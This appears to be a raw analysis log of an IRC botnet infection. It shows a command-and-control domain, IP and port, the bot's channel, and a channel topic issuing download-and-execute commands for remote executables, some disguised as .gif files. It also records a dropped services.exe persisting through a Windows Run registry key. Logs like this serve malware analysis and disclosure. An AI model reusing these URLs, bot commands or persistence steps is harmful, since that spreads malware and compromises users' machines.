urcdw.zavoddebila.com DNS_TYPE_A 72.20.14.38
72.20.14.38:33333
Nick: {NOVA}[USA][XP-SP3]610119
Username: VirUs
VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY
Joined Channel: ##Turb0-XXX##
PRIVMSG #d4 :Done..
PRIVMSG #d2 :Done..
Channel Topic for Channel ##Turb0-XXX##: “!NAZELturbo http://thenaturemedia.in/install.48691.exe ifasfa264.exe | !NAZELturbo http://7arhive.com/setup585.exe afasfa4.exe | !NAZELturbo http://img103.herosh.com/2011/02/09/666929080.gif fsaf24.exe | !NAZELturbo http://img104.herosh.com/2011/02/08/547715969.gif micro1.exe”
Private Message to Channel ##Turb0-XXX##: “Executed process “fsaf24.exe”.”
Private Message to Channel ##Turb0-XXX##: “Download failed!”
Private Message to Channel ##Turb0-XXX##: “Executed process “afasfa4.exe”.”
Private Message to Channel
Private Message to Channel ##Turb0-XXX##: “Executed process “micro1.exe”.”
Process Created:
C:DOCUME~1ADMINI~1LOCALS~1Tempservices.exe
Registry Modifield
HKLM​SOFTWARE​Microsoft​Windows​CurrentVersion​Run​ info
MS Service Manager C:​DOCUME~1​ADMINI~1​LOCALS~1​Temp​services.exe
infos about hosting:
http://whois.domaintools.com/72.20.14.38